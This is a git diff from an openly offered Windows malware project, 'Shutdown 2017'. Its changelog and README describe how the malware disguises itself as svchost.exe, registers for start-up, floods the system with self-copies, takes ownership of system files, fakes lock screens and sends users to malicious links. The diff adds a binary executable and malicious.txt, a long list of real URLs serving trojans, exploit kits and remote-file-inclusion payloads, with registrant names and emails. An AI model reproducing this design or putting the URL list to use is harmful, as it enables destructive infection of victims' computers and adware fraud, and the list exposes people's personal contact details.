diff --git a/CHANGELOG.md b/CHANGELOG.md
index bf8277a..c60b58b 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,3 +1,17 @@
+1.5 (11/12/2017)
+
+- Major bug fixes to Shutdown 2017
+- Shutdown dependencies fixed. Can now be used by itself
+- Silent and hidden payload executable added.
+- Shutdown 2017 minor payload added
+- Payloads automatically register for start-up.
+- New executable now works as a virus flooder
+- Builder library issues fixed
+- Locker calibration fixed
+- Malware will randomly send users to links (Adware capability - see malicious.txt)
+
+See ReadME for more details on update.
+
 1.4.1 (11/9/2017)
 
 - Icons added to programs
diff --git a/README.md b/README.md
index c183849..882e3a3 100644
--- a/README.md
+++ b/README.md
@@ -42,4 +42,26 @@ The scanning is where the damage is done. This software will go through every sy and clean system file. Meaning, whenever you try to run a file found inside of "Windows", it will run the .exe, however it will lock your screen meanwhile. For the sake of security and educational purposes, I set the password to simply "hi". If you want to change the password for whatever reason, you will need to recompile the code. -The scan also goes through your System32 and SysWOW64 folder. It will forcibly take ownership of your files. I have included the malware in a separate download. Run it at your own risk. +The scan also goes through your System32 and SysWOW64 folder. It will forcibly take ownership of your files. As of the 1.5 update (11/12/2017), Shutdown 2017 now unloads a new malware that installs +itself into the client's computer. Once Shutdown2017 runs, it will generate a fake svchost.exe file and run it. The assembly and memory size blends right in with the other svchost.exe processes. The +fake svchost is placed in %TEMP%. Due to the fact Shutdown2017 requires administrator permissions, the malware is treated as a child and will have full access to the client's computer, giving it the +opportunity to perform it's payloads. + +The moment the malware is opened, it install itself in Program Files and create a fake settings folder in your home documents folder. Then it will generate a fake executable with a silly name. The +list of .exe names can be found in fake_exe.h. The new executable becomes a duplicate of the malware and will also be run. This will end up creating a small loop, which will start to generate new +executables every 5-10 seconds. The flooding will start to hog up the client's CPU and slow down their computer tremendously. + +That's not all though. The malware can run 5 different payloads while it's running in the background. + +- Generate AHXRLocker.exe type files in the Shutdown2017 folder, being a pest. 
Even if you delete the folder, the process will continue to just generate new lockable files.
+- Open a malicous url (malicious.txt). Like I said earlier, this program was just made for educational purposes. But obviously someone could easily replace the links with ads just to generate revenue.
+- Duplicate itself and create another child
+- Force flood the client
+- Open up Shutdown2017 again (Another loop)
+- [Fake lockdown screen](https://i.imgur.com/qBSlccZ.png)
+
+I can't find the location of where I downloaded the list of malicious URLs. If I find it, I'll update this. Regardless this whole Shutdown 2017 malware will destroy someone's computer either way. If
+they are smart enough to close out the scanner via task manager, it still won't make a difference as there's already background work going on. The scanner will destroy your System files while
+the background malware will unload it's payloads.
+
+I have included the malware in a separate download. Run it at your own risk.
diff --git a/_build/BuilderLib.lib b/_build/BuilderLib.lib
index 4643ff3..6e18c3e 100644
Binary files a/_build/BuilderLib.lib and b/_build/BuilderLib.lib differ
diff --git a/_build/Protected.exe b/_build/Protected.exe
new file mode 100644
index 0000000..bbbb810
Binary files /dev/null and b/_build/Protected.exe differ
diff --git a/_build/malicious.txt b/_build/malicious.txt
new file mode 100644
index 0000000..436bc7f
--- /dev/null
+++ b/_build/malicious.txt
@@ -0,0 +1,2330 @@ +"2009/03/22_00:00","-","205.209.143.94/000f1.htm","-","Trojan","-","33314","0","US", +"2009/03/22_00:00","-","205.209.143.94/000f2.htm","-","Trojan","-","33314","0","US", +"2009/04/27_00:00","-","200.122.168.229/dl/goldvipclub/","-","trojan Casino","-","3790","0","CR", +"2009/04/27_00:00","-","200.122.168.229/dl/goldvipclub/TrackDownload.dll?DID=991392","-","trojan Casino","-","3790","0","CR", +"2009/05/08_00:00","diaryofagameaddict.com","208.76.80.16","ossus.tchmachines.com.","directs to exploits","Adrian Chua / adrian@fusion-studios.com","25767","0","US", +"2009/05/08_00:00","espdesign.com.au","64.49.219.215","-","directs to exploits","-","10532","0","US", +"2009/05/08_00:00","iamagameaddict.com","208.76.80.16","ossus.tchmachines.com.","directs to exploits","Adrian Chua / adrian@fusion-studios.com","25767","0","US", +"2009/05/08_00:00","kalantzis.net","208.83.210.33","box7.vistapages.com.","directs to exploits","John Kalantzis JOHN.KALANTZIS@VIDEOTRON.CA","13826","0","CA", +"2009/05/08_00:00","slightlyoffcenter.net","208.76.80.19","yavin.tchmachines.com.","directs to exploits","Jennifer Huang / jch1@cec.wustl.edu","25767","0","US", +"2009/05/08_00:00","toddscarwash.com","204.12.47.43","toddscarwash.com.","directs to exploits","david@lamicrochip.com","20021","0","US", +"2009/05/13_00:00","-","72.10.169.26/loader.exe","-","Cutwail/Pushdo","-","36666","0","CA", +"2009/05/13_00:00","tubemoviez.com","63.251.171.80","-","redirects to rogue","setraff@gmail.com","14744","0","US", +"2009/05/17_00:00","ipl.hk","77.232.66.18","77-232-66-18.static.servage.net.","redirects to exploits","IP PAK LUN ipl.hk@alan-ip.com","29671","0","DE", +"2009/05/18_00:00","-","85.13.236.154/v50/?v=66&s=I&uid=1824245000&p=13310&q=","85.13.236.154.reverse.coreix.net","Malware calls home","-","31708","0","GB", +"2009/05/18_00:00","crackspider.us/toolbar/install.php?pack=exe","85.159.233.47","-","Adware.Cracksearch.A","Varavva Brothers Ltd. 
/ bestserials@mail.ru","43350","0","NL", +"2009/05/20_00:00","pos-kupang.com/","202.146.4.119","-","redirects to exploits","PT Timor Media Grafika / hansen_pah@yahoo.com","18365","0","ID", +"2009/05/20_00:00","rupor.info","62.149.12.191","rupor.info.","redirects to exploits","Viktor Tjutjun / support@rupor.info","15497","0","UA", +"2009/05/20_00:00","svision-online.de/mgfi/administrator/components/com_babackup/classes/fx29id1.txt","78.31.65.216","-","RFI","Juergen Voegeli / info@xantron.de","24961","0","DE", +"2009/05/22_00:00","officeon.ch.ma/office.js?google_ad_format=728x90_as","88.191.20.248","ns2.venez.net.","directs to Exploits","-","12322","0","FR", +"2009/05/22_00:00","sn-gzzx.com","222.76.215.12","-","Exploits","y113991122@yahoo.com.cn","4134","0","CN", +"2009/05/22_00:00","sunlux.net/company/about.html","211.234.100.137","-","directs to Exploits","-impala@nate.com","3786","0","KR", +"2009/05/23_00:00","-","219.148.34.9/dmdown/sss.exe","-","Trojan","-","17672","0","CN", +"2009/05/23_00:00","outporn.com","63.217.31.51","web-r1-h51.globecorp.net.","directs to sites with exploits","Long Mechies LLC / axel1230@gmail.com","3491","0","US", +"2009/05/23_00:00","timothycopus.aimoo.com","74.52.179.179","b3.b3.344a.static.theplanet.com.","directs to trojan","WhoisGuard / 2cb93a446cab4816bf9b3dbf18d9b3c2.protect@whoisguard.com","21844","0","US", +"2009/05/23_00:00","xindalawyer.com","218.5.79.63","-","Exploits","jimmy@hn12345.com","4134","0","CN", +"2009/05/24_00:00","freeserials.spb.ru/key/68703.htm","91.195.110.99","91-195-110-99.hmrtelecom.ru.","TDSS","-","43671","0","RU", +"2009/05/26_00:00","deletespyware-adware.com","174.120.200.218","da.c8.78ae.static.theplanet.com.","Fake Antivirus","office@deletespyware-adware.com","21844","0","US", +"2009/05/26_00:00","orbowlada.strefa.pl/text396.htm","217.74.66.183","www.strefa.pl.","Directs to rogue","-","16138","0","PL", +"2009/05/28_00:00","ruiyangcn.com","61.139.126.15","-","directs to 
exploits","inicn@126.com","4134","0","CN", +"2009/05/28_00:00","zkic.com","174.37.172.162","www.se.parahost.com.","directs to exploits","zhirong yang cdyzr@yahoo.com.cn","36351","0","US", +"2009/05/31_00:00","adserving.favorit-network.com/eas?camp=19320;cre=mu&grpid=1738&tag_id=618&nums=FGApbjFAAA","91.209.163.184","vemw04.c76.fvtn.net.","-","2ffba9ee4ff19e8587163b873c03ff22-913471@contact.gandi.net","48445","0","EU", +"2009/05/31_00:00","cracks.vg/d1.php","111.92.237.115","server111092237115.i-services.com.hk.","Directs to rogue","-","45816","0","HK", +"2009/06/03_00:00","-","63.227.18.137/id5.txt","mail.vail-valley.com","RFI","-","209","0","US", +"2009/06/03_00:00","juicypussyclips.com","74.81.93.72","ip72.envelopebizs.com.","Directs to sites with exploits","Niels Musschoot / adolf.web@gmail.com","27413","0","US", +"2009/06/04_00:00","-","202.91.74.136/bjp3/id3.txt","-","RFI","-","9830","0","IN", +"2009/06/05_00:00","nuptialimages.com","64.6.241.22","s22.n241.n6.n64.static.myhostcenter.com.","directs to exploits","NEDHORN@COMCAST.NET","11343","0","US", +"2009/06/07_00:00","bezproudoff.cz","93.185.104.30","www20.pipni.cz.","directs to exploits","-","43541","0","CZ", +"2009/06/07_00:00","ceskarepublika.net","93.185.104.27","www17.pipni.cz.","directs to exploits","pvachtl@quick.cz","43541","0","CZ", +"2009/06/07_00:00","hotspot.cz","93.185.104.30","www20.pipni.cz.","directs to exploits","Simon Zaruba / simzaruba@seznam.cz","43541","0","CZ", +"2014/04/02_08:53","www.gmcjjh.org/DHL","198.252.70.200","stats.green.mysitehosted.com.","Document.zip Trojan.Kryptic","Somnath gmjjh / rexinfosolution@gmail.com","36351","0","US", +"2009/06/07_00:00","nerez-schodiste-zabradli.com","93.185.104.29","www19.pipni.cz.","directs to exploits","Petr Danek - Danek a Danek / danek-danek@volny.cz","43541","0","CZ", +"2009/06/07_00:00","nordiccountry.cz","93.185.104.28","www18.pipni.cz.","directs to exploits","-","43541","0","CZ", 
+"2009/06/07_00:00","nowina.info","93.185.104.30","www20.pipni.cz.","directs to exploits","Gregor Stopa / gstopa@volny.cz","43541","0","CZ", +"2009/06/07_00:00","obada-konstruktiwa.org","81.2.194.138","c138un.forpsi.com.","directs to exploits","Milos Brejcha Milos Brejcha / milos@kbj.cz","24806","0","CZ", +"2009/06/07_00:00","otylkaaotesanek.cz","81.2.195.176","d176ud.forpsi.com.","directs to exploits","-","24806","0","CZ", +"2009/06/07_00:00","pb-webdesign.net","93.185.104.29","www19.pipni.cz.","directs to exploits","Petr Beran Beran / dom-reg-joker@ignum.cz","43541","0","CZ", +"2009/06/07_00:00","pension-helene.cz","81.2.195.176","d176ud.forpsi.com.","directs to exploits","helene@tiscali.cz","24806","0","CZ", +"2009/06/07_00:00","podzemi.myotis.info","93.185.104.29","www19.pipni.cz.","directs to exploits","Ladislav Mikes / la.mi@volny.cz","43541","0","CZ", +"2009/06/07_00:00","smrcek.com","93.185.104.29","www19.pipni.cz.","directs to exploits","Pavel Jedlicka / dom-reg-joker@ignum.cz","43541","0","CZ", +"2009/06/07_00:00","spekband.com","93.185.104.30","www20.pipni.cz.","directs to exploits","Michal Gancarcik / michalgancarcik@seznam.cz","43541","0","CZ", +"2014/04/11_11:48","m2132.ehgaugysd.net/zyso.cgi?18","66.96.223.209","-","leads to exploit kit","Registrar Abuse Contact abuse@web.com","21788","0","US", +"2009/06/07_00:00","webcom-software.ws/links/?153646e8b0a88","64.70.19.33","mailrelay.33.website.ws.","exploits","Aleksandr A Kainov / kainovalex@mail.ru","3561","0","US", +"2009/06/07_00:00","worldgymperu.com","74.54.143.242","impulse.websitewelcome.com.","directs to exploits","pp75@mixmail.com","21844","0","US", +"2009/06/07_00:00","zgsysz.com","125.65.112.23","-","directs to exploits","lans-1126@163.com","4134","0","CN", +"2009/06/08_00:00","oknarai.ru","66.118.146.69","66-118-146-69.static.sagonet.net.","directs to exploits","gray@rostov.ru","21840","0","US", 
+"2009/06/10_00:00","www.realinnovation.com/css/menu.js","67.202.87.234","ip234.67-202-87.static.steadfast.net.","redirects to exploits","REALINNOVATION.COM@domainservice.com","32748","0","US", +"2009/06/12_00:00","hardcorepornparty.com","88.214.193.196","-","directs to exploits","DMITRI KUZNETSOV / wm@beach-book.com","46636","0","GB", +"2009/06/12_00:00","zous.szm.sk","88.86.113.4","freehosting.szm.com.","directs to exploits","-","39392","0","CZ", +"2009/06/13_00:00","noveslovo.com","77.222.131.86","86.0-127.131.222.77.in-addr.arpa.","directs to exploits","-","21219","0","UA", +"2009/06/14_00:00","dimsnetwork.com","88.214.193.196","-","Directs to exploits","Dmitri Kuznetsov / wm@beach-book.com","46636","0","GB", +"2009/06/14_00:00","luckyblank.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / e09201274974449886ada169b50d5879.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyclean.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 7e0c10ad0bb648489573b22a28f86594.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyclear.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 1ad83c2f5960476583b10b7bf18fbccf.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyeffect.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / f974291e6c834cb58b61da35ee0a825c.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyhalo.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 5ef888c31e574ee39bec8149621cbd2b.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckypure.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / befe020f9cc8404d8696e8f255d0eadc.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyshine.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard 
Protected / a45a009dbed24caf8d5c337e097c367b.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckysuccess.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 92f381eb474e400f91bbe7a831dc9e82.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckysure.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / e292ee43d78142ada7bc024ac5f0fed7.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckytidy.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 1ae7e16139f64a14a63beedbc44bd4bf.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","nudebeachgalleries.net","88.214.242.12","-","directs to exploits","Dmitri Kuznetsov / wm@beach-book.com","46636","0","GB", +"2009/06/15_00:00","buffalogoesout.com","66.96.146.201","201.146.96.66.static.eigbox.net.","directs to exploits","Addnet / brianw@addnetinc.com","29873","0","US", +"2009/06/16_00:00","-","213.174.143.196/v/g.php?d=79","-","directs to rogue","-","39572","0","UA", +"2009/06/16_00:00","achren.org","83.245.63.229","http.sodium.lon.periodicnetwork.com.","directs to exploits","Andrew Clancy / nite@achren.org","33970","0","GB", +"2014/03/31_11:44","-","5.135.43.43/adm/documentos.zip","-","Trojan.Banker","-","16276","0","FR", +"2014/03/31_11:44","-","185.12.14.208/tmp/Boleto_Vencido.zip","-","Trojan.Banker","-","50673","0","NL", +"2009/06/16_00:00","associatesexports.com","209.25.133.107","altar14.supremepanel14.com.","directs to exploits","Muhammed Ishaaq / ezee2contact@gmail.com","11388","0","US", +"2014/04/07_18:32","-","193.218.144.3/cp/login/","-","Gozi control panel","-","197252","0","UA", +"2009/06/18_00:00","-","69.3.109.79/1.html","h-69-3-109-79-static.nycmny83.covad.net","Exploits","-","18566","0","US", +"2009/06/18_00:00","antalya.ru/links/","89.111.176.89","fe31-1.hc.ru.","directs to exploits","pro234@yandex.ru","41126","0","RU", 
+"2009/06/18_00:00","conds.ru","90.156.201.22","fe.shared.masterhost.ru.","directs to exploits","lasic@mail.ru","25532","0","RU", +"2014/04/06_04:49","img001.com/business/qiji.exe","36.250.3.247","-","Trojan.Spy","Registrar Abuse Contact Email:supervision@xinnet.com","4837","0","CN", +"2009/06/20_00:00","unalbilgisayar.com","84.51.21.163","host-84-51-21-163.teletektelekom.com.","directs to exploits","admin@unalbilgisayar.com","34104","0","TR", +"2009/06/24_00:00","www.t-sb.net","72.232.219.152","152.219.232.72.static.reverse.ltdomains.com.","directs to exploits","Norets Mihail Vitalevich / nmihey@gmail.com","22576","0","US", +"2009/06/25_00:00","hanulsms.com","124.217.216.40","-","directs to exploits","zzigger@naver.com","38661","0","KR", +"2009/06/25_00:00","semengineers.com","216.245.193.34","thor.corpservers.net.","directs to exploits","hostmaster@inspediumhosting.com","46475","0","US", +"2009/06/25_00:00","srslogisticts.com","64.191.16.37","reseller4.hostingmadeeasy.com.","directs to exploits","Green Shark Green Shark / younisrajput@hotmail.com","21788","0","US", +"2009/06/25_00:00","tendersource.com","75.125.56.218","218.56.125.75.in-addr.ev1.opticaljungle.com.","directs to exploits","Domain Admin / contact@privacyprotect.org","21844","0","US", +"2009/06/25_00:00","traff1.com/in.cgi?5","66.232.116.49","-","directs to trojan","SergeyGolushko / SERGEY_GOLUSHKO@YAHOO.COM","29802","0","US", +"2009/06/25_00:00","web-olymp.ru","81.176.232.104","server4.neoweb.ru.","directs to exploits","web-webolymp@yandex.ru","8342","0","RU", +"2014/04/06_04:49","oprahsearch.com/scripts/net19.exe","192.249.59.79","-","Trojan.Inject","Aaron Polmeer / domains@searchexperiences.com","3842","0","US", +"2014/04/06_04:49","oprahsearch.com/scripts/brez251.exe","192.249.59.79","-","-","Aaron Polmeer / domains@searchexperiences.com","3842","0","US", +"2014/04/02_17:58","rl8vd.kikul.com/ci7ka5t2ue","173.212.223.250","ooo.177ok.ru.","exploit kit","Registrar Abuse Contact 
abuse@web.com","21788","0","US", +"2009/06/28_00:00","sbnc.hak.su/spread.txt","91.189.81.71","www2.wen.ru.","RFI","wapplanet@mail.ru","8342","0","RU", +"2009/06/28_00:00","somnoy.com","91.197.128.216","h6.data-xata.net.","directs to exploits","Kostya B Zubar / cony@ukr.net","8870","0","UA", +"2014/04/02_08:53","incoctel.cl/8RHFBgK4.php?html=27","190.114.252.75","server0126-0711.dnsmisitio.net.","Drive-by","-","52368","0","CL", +"2014/04/02_08:53","incoctel.cl/8RHFBgK4.php?id=23694557","190.114.252.75","server0126-0711.dnsmisitio.net.","Drive-by","-","52368","0","CL", +"2009/06/29_00:00","nadegda-95.ru","87.242.126.153","ant6.fast.ru.","directs to exploits","nadegda-95@mail.ru","25532","0","RU", +"2009/06/29_00:00","romsigmed.ro","86.35.15.214","www4.linux.romtelecom.net.","directs to exploits","-","9050","0","RO", +"2009/06/29_00:00","spatsz.com","67.210.126.110","orion.lunarpages.com.","directs to exploits","kasproduct@wanadoo.fr","15244","0","US", +"2009/06/29_00:00","svetyivanrilski.com","212.36.9.1","ns5.tophostbg.net.","directs to exploits","Stilian Nikolov / st.nikolov@gmail.com","39388","0","BG", +"2009/06/29_00:00","titon.info","212.36.9.10","ns1.tophostbg.net.","directs to exploits","Tania Terzieva / tania_terzieva@abv.bg","39388","0","BG", +"2009/06/29_00:00","tophostbg.net","212.36.9.10","ns1.tophostbg.net.","directs to exploits","Georgi Chakarov / info@tophost.bg","39388","0","BG", +"2009/06/29_00:00","vivaweb.org","212.36.9.1","ns5.tophostbg.net.","directs to exploits","Georgi Zhulkov / zhulkov@gmail.com","39388","0","BG", +"2009/06/29_00:00","vocational-training.us","216.8.179.24","ptr-216-8-179-24.ptr.nextdimensioninc.com.","directs to exploits","webmaster@okcontentweb.com","13727","0","CA", +"2009/06/29_00:00","warco.pl","81.2.200.162","host-81-2-200-162.alpha.pl.","directs to exploits","warco.pl","24806","0","CZ", +"2009/06/30_00:00","bde.be","194.146.224.100","cluster.sivit.org.","directs to 
exploits","administration@piezo-forte.be","13193","0","FR", +"2009/06/30_00:00","pwvita.pl","77.55.70.169","acs169.rev.netart.pl.","directs to exploits","-","15967","0","PL", +"2009/06/30_00:00","roks.ua","80.91.176.135","uahost01.hc.ua.","directs to exploits","roks@name.biz.ua","21219","0","UA", +"2009/06/30_00:00","skgroup.kiev.ua","80.91.176.135","uahost01.hc.ua.","directs to exploits","hostmaster@kiev.ua","21219","0","UA", +"2009/06/30_00:00","tecnocuer.com","190.228.29.81","mx2981.godns.net.","directs to exploits","Domain Discreet / 1bedb6390a1411500163a946ac9b2fea@domaindiscreet.com","7303","0","AR", +"2009/06/30_00:00","tk-gregoric.si","91.185.202.90","mail.internetstoritve.com.","directs to exploits","turisticna.kmetija.gregoric@siol.net","41828","0","SI", +"2009/06/30_00:00","tomalinoalambres.com.ar","190.228.29.81","mx2981.godns.net.","directs to exploits","-","7303","0","AR", +"2009/06/30_00:00","vipdn123.blackapplehost.com","69.162.86.4","4-86-162-69.static.reverse.lstn.net.","vbscript downloader","dns@iversit.com","46475","0","US", +"2009/06/30_00:00","womenslabour.org","83.142.47.61","www.linux.webserwer.pl.","directs to exploits","rogoz@firma.hoga.pl","39168","0","PL", +"2009/06/30_00:00","wroclawski.com.pl","83.142.47.61","www.linux.webserwer.pl.","directs to exploits","-","39168","0","PL", +"2009/07/01_00:00","xoomer.alice.it/email02/bom.jpg","62.211.68.12","-","trojan","-","20580","0","IT", +"2009/07/11_00:00","www.propan.ru/forum/downloads.php","89.111.177.27","fe91-1.hc.ru.","RFI","admin@propan.ru","41126","0","RU", +"2009/07/21_00:00","firehouse651.com/gallery/images/copyright.txt","64.40.123.35","mercury.van-dns.com.","RFI","FireHouse651.COM / sales@superwebhost.com","14280","0","CA", +"2009/07/21_00:00","www.freewebtown.com/atakus/Nokia/BotNetNew.txt","208.75.230.43","www.freewebtown.com.","RFI","Tulip Systems / abuse@tulix.com","36820","0","US", 
+"2009/07/21_00:00","webcashmaker.com/v2/members/trade_traffic.php","74.206.224.180","-","RFI","Domains by Proxy, Inc. / WEBCASHMAKER.COM@domainsbyproxy.com","27257","0","US", +"2009/07/21_00:00","spykit.110mb.com/tools/id.txt","70.38.113.158","ip-70-38-113-158.static.privatedns.com.","RFI","110mb.server@gmail.com","32613","0","CA", +"2009/07/21_00:00","sentrol.cl/components/kampret.jpg","74.200.91.144","unknown144.91.200.74.defenderhosting.com.","RFI","-","14383","0","US", +"2009/07/21_00:00","www.kjbbc.net/bbs/data/gallery/1207290228/inbox.txt","112.216.25.75","-","RFI","Ho Sung Kim / thebible1611@hanmail.net","3786","0","KR", +"2009/07/21_00:00","www.torgi.kz/help/id2.txt","212.154.208.169","-","RFI","-","9198","0","KZ", +"2009/07/21_00:00","www.torgi.kz/help/idxx.txt","212.154.208.169","-","RFI","-","9198","0","KZ", +"2009/07/21_00:00","www.uriyuri.com/bbs/skin/zero_vote/1.txt","202.131.25.49","-","RFI","Chae Yu ri / freen@introcom.net","23576","0","KR", +"2009/07/21_00:00","www.usaenterprise.com/images/images.txt","212.70.224.183","virtweb-cms.nethouse.it.","RFI","usa enterprise / usainfo@virgilio.it","16141","0","IT", +"2009/07/21_00:00","www.wigglewoo.com/portfolio/contests/contest-006.png","85.13.136.149","dd15308.kasserver.com.","RFI","owner-tjana.habermann@gmx.net","34788","0","DE", +"2009/07/21_00:00","xorgwebs.webs.com/stx.1","216.52.115.50","membersite.webs.com.","RFI","FREEWEBS, INC / inquiries@webs.com","10913","0","US", +"2009/07/21_00:00","plengeh.wen.ru/id.txt","91.189.80.71","www.wen.ru.","RFI","wapplanet@mail.ru","8342","0","RU", +"2009/07/21_00:00","wahyufian.zoomshare.com/files/bot.txt","64.94.37.195","frontend.zoomshare.com.","RFI","DW Data, Inc. 
/ totalweblevel2@digitalwork.com","19024","0","US", +"2009/07/24_00:00","www.hospedar.xpg.com.br/nome.txt","200.149.77.224","-","RFI","Contato WFG / registro@webforce.com.br","7738","0","BR", +"2009/08/03_00:00","dl.heima8.com/pv/dl.htm?adid=20132&sid=0211","58.215.240.96","-","-","HuYangFeng Info Tech Co.,Ltd. / whs@yiclick.com","4134","0","CN", +"2009/08/05_00:00","update.51edm.net/20090728/01.dll","222.222.204.68","-","trojan","ktone123@sohu.com","4134","0","CN", +"2009/08/05_00:00","update.51edm.net/20090728/01.kdg","222.222.204.67","-","trojan","ktone123@sohu.com","4134","0","CN", +"2009/08/05_00:00","www.xiruz.kit.net/mola.jpg","201.7.184.2","-","trojan","GLOBO Comunicacao e Participacoes S.A. / fapesp@corp.globo.com","28604","0","BR", +"2009/08/12_00:00","wfoto.front.ru/fotos.com","194.186.88.45","ftp.front.ru.","trojan Banload","hosting@hc.ru","3216","0","RU", +"2009/08/12_00:00","ska.energia.cz/download/imer.up","217.31.49.10","kojak.core.ignum.cz.","trojan Bancos","Libor Balek / energia@opava.cz","29134","0","CZ", +"2009/08/15_00:00","www.obyz.de/webproxytest.txt","85.13.138.226","dd18438.kasserver.com.","RFI","Daniel Hochheimer / info@all-inkl.com","34788","0","DE", +"2009/08/17_00:00","callingcardsinstantly.com/webalizer/050709wareza/crack=17=keygen=serial.html","216.157.140.193","hsphere.cc.","directs to exploits","BuzzyPlanet,Inc. / agent@buzzyplanet.com","16557","0","US", +"2009/08/17_00:00","dawnframing.com/webalizer/050709wareza/crack=17=keygen=serial.html","216.81.64.192","rapidcolo.com.","directs to exploits","Dawn Framing Inc. / rdsantos@cystemlink.com","16557","0","US", +"2009/08/17_00:00","free-crochet-pattern.com/webalizer/050709wareza/crack=17=keygen=serial.html","216.157.140.192","hsphere.cc.","directs to exploits","Buzzy Planet, Inc. 
/ agent@buzzyplanet.com","16557","0","US", +"2009/08/17_00:00","-","199.238.181.161/setup.exe","-","Rogue","-","2914","0","US", +"2009/08/25_00:00","js.tongji.linezing.com/1189582/tongji.js","119.42.225.167","lvs1.bmvip.cnz.alimama.com.","directs to exploits","Le Guo larrykwo@yahoo.com","37963","0","CN", +"2009/08/30_00:00","www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699","188.64.184.32","bluechip3.ukhost4u.com.","-","domain-admin@easily.co.uk","47625","0","GB", +"2009/09/05_00:00","adgallery.whitehousedrugpolicy.gov/members/Miley-Cyrus-Nude/default.aspx","198.77.71.192","adgallery.whitehousedrugpolicy.gov.","directs to trojan","abuse@noc.privatedns.com","3356","0","US", +"2009/09/11_00:00","-","213.163.89.54/lib/index.php?t=2","-","redirects to exploit kit","-","20495","0","NL", +"2009/09/11_00:00","www.vvvic.com","118.220.175.24","-","obfuscated iframe directs to exploits","jini lee / jini6708@hanmail.net","9318","0","KR", +"2009/09/12_00:00","sportsulsan.co.kr/poll/aipi/id.txt","211.171.231.215","sportsulsan.co.kr.","RFI","sportsulsan@hanmail.net","3786","0","KR", +"2009/09/13_00:00","-","66.96.214.117:8080","6696214117.hostnoc.net","compromised server with nginx at port 8080","-","21788","0","US", +"2009/09/13_00:00","-","84.242.167.49:8080","www.sopharma.bg","compromised server with nginx at port 8080","-","8672","0","BG", +"2009/09/13_00:00","hst-19-33.splius.lt:8080","77.79.19.33","hst-19-33.splius.lt.","compromised server with nginx at port 8080","hostmaster@domreg.lt","25406","0","LT", +"2009/09/13_00:00","tabex.sopharma.bg:8080","84.242.167.49","www.sopharma.bg.","compromised server with nginx at port 8080","-","8672","0","BG", +"2009/09/13_00:00","-","209.9.188.130/t.txt","-","RFI","-","3491","0","US", +"2009/09/16_00:00","www.professionalblackbook.com/","96.30.28.181","host.disantolaw.com.","obfuscated iframe directs to exploits","The Corporate and Real Estate Law Group, P.L. 
/ bethdesanto@yahoo.com","19066","0","US", +"2009/09/18_00:00","0koryu0.easter.ne.jp","208.71.106.216","super-html-7.fc2.com.","obfuscated iframe directs to LuckySploit","-","40263","0","US", +"2009/09/19_00:00","www.whitesports.co.kr","211.202.2.17","web-7.blueweb.co.kr.","iframe directs to LuckySploit","yoon1092@hotmail.com","9318","0","KR", +"2009/09/23_00:00","-","213.163.89.54/mito/","-","redirects to exploit kit","-","20495","0","NL", +"2009/09/24_00:00","typeofmarijuana.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","trafficgrowth.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","thcvaporizer.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","roorbong.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","thcextractor.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","purethc.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","wHd9hT@privacypost.com","23352","0","US", +"2009/09/24_00:00","potvaporizer.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","portablevaporizer.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","cannabispicture.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","cannabislyric.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", 
+"2009/09/26_00:00","dp-medien.eu","81.169.145.69","w05.rzone.de.","compromised site directs to exploits","hostmaster@cronon-isp.net","6724","0","DE", +"2009/09/26_00:00","juedische-kammerphilharmonie.de","85.13.135.179","dd14202.kasserver.com.","compromised site directs to exploits","-","34788","0","DE", +"2009/09/26_00:00","vernoblisk.com","67.228.85.201","hostica.com.","compromised site directs to exploits","Vern Oblisk Bail Bonds / voblisk@tampabay.rr.com","36351","0","US", +"2009/09/26_00:00","vural-electronic.com","81.169.145.82","w82.rzone.de.","compromised site directs to exploits","Ayhan Vural / ayhanv@gmx.de","6724","0","DE", +"2009/11/01_18:49","-","217.23.6.17:10283/d3n2829231.dat","-","malware calls home","-","15435","0","NL", +"2009/11/13_20:52","-","200.80.97.174/maravilha.txt","multilink-97-174.ipAddr.multilink-ht.net.","RFI","-","27767","0","HT", 